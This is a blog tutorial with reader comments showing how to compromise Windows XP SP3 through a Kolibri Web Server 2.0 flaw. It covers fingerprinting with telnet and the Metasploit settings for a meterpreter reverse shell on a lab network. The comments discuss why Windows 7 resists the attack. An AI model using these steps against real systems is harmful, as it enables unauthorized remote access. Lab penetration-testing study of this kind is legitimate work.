• 25,450
  • +1,014
  • 2,796
Hacking Windows XP SP3 via Kolibri Web Server 2.0 (Zeroday)

Hacking Windows XP SP3 via Kolibri Web Server 2.0 (Zeroday)

Bookmark

Type : Tutorial

Level : Easy

Attacker O.S : Backtrack 5 R1

Victim O.S : Windows XP SP3

Tested Vulnerable Application : Kolibri 2.0

Exploit Credit : mr_me, The_Leader

Another zeroday exploit found in Kolibri HTTP Web Server. Actually this exploit was written into metasploit framework module in 2011-08-03, but until now there's no fixation or update from the Kolibri developer.

Requirements :

1. Metasploit Framework

2. Kolibri HTTP Server 2.0(download below)

Download from Mediafire.com

3. Kolibri HTTP exploit(download link)

Mediafire.com

Step By Step :

Attacker IP address : 192.168.8.93

Victim IP address : 192.168.8.94

1. Download the kolibri_http.rb exploit from the link above and for testing purpose I've also included the link to download the vulnerable Kolibri web server 2.0 so you can try in your own lab.

Copy the kolibri_http.rb to following folder(I'm using backtrack 5 R1) :

/pentest/exploit/framework/modules/exploit/windows/http

2. To determine which type of server running, we can do a simple fingerprint by telneting to the remote host and specified port. In this case the victim kolibri HTTP server was run on port 8080, but the usual web server was run on port 80.

telnet    192.168.8.94      8080
               ^             ^
        remote ip address   port

Hacking Windows XP SP3 via Kolibri Web Server 2.0 (Zeroday)

3. The next step let's prepare the exploit to exploiting the vulnerable kolibri web server by choosing the exploit we've already added in step 1. In this exploit I'm using meterpreter payload.

Hacking Windows XP SP3 via Kolibri Web Server 2.0 (Zeroday)

4. Set up the needed switch to perform our exploit. To view all the available switch for this exploit + payload just run show options command.

Hacking Windows XP SP3 via Kolibri Web Server 2.0 (Zeroday)

Information :

set rhost 192.168.8.94 --> determine the target ip address

set rport 8080 --> determine the target port which run kolibri web server

set lhost 192.168.8.93 --> our local ip address to receive reverse connection from victim

set lport 443 --> local port to handle reverse connection from victim

5. When everything we've been set up correctly, now let's try to run the exploit by using exploit command and see it's successful or not.

Hacking Windows XP SP3 via Kolibri Web Server 2.0 (Zeroday)

pWn3D!!

Countermeasures :

1. Until now I'm wrote this tutorial 2011-10-21 Kolibri web server still no update a.k.a the exploit status still zeroday

Hope it's useful ๐Ÿ™‚

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • Matt Andreko

    Vishnu,
    Instead of copying your exploit into:
    /pentest/exploit/framework/modules/exploit/windows/http
    You should copy it into:
    ~/.msf4/modules/exploits/windows/http
     

    • v4L

      #Matt
      Hmm…but that’s what I’m doing…usually the .msf4 folder was for fileformat exploit generated file.

  • jeet jain

    hi bro i tested it on windows 7 but wont work server i run on windows 7 and found not working ?should i use xp box and only xp service pack 3 will be or any xp box i can try plz reply soon 

    • v4L

      #jeetjain
      I haven’t try it in Windows 7, if you have try it, maybe it won’t work..

  • Matt Andreko

    It does not work in Windows 7. It only will work in xp sp3 or windows 2003 sp2, per http://www.metasploit.com/modules/exploit/windows/http/kolibri_http
    Windows 7 has DEP and ASLR which helps prevent exploitation.  There's more work to be done on the metasploit module to get it past those, if it's possible.

    • v4L

      #Matt
      Thanks for explanation ๐Ÿ™‚

  • jeet jain

    Thanks Matt Andreko  bro 

  • Hi,
    As author of Kolibri WebServer let me clarify that Kolibri WS is not intended for any production use or any use on publicly available address. It is only development server for easy testing of PHP/web applications locally, it does not scale, it is not secure as it is not intended to be secure or scalable.

    • v4L

      #Fedja S
      Sure I’LL deliver your message..but btw, even it was not for publicly any production, but how if I run your webserver for development/easy testing on a Local Area Network inside my campuss that has more than thousand of users inside it?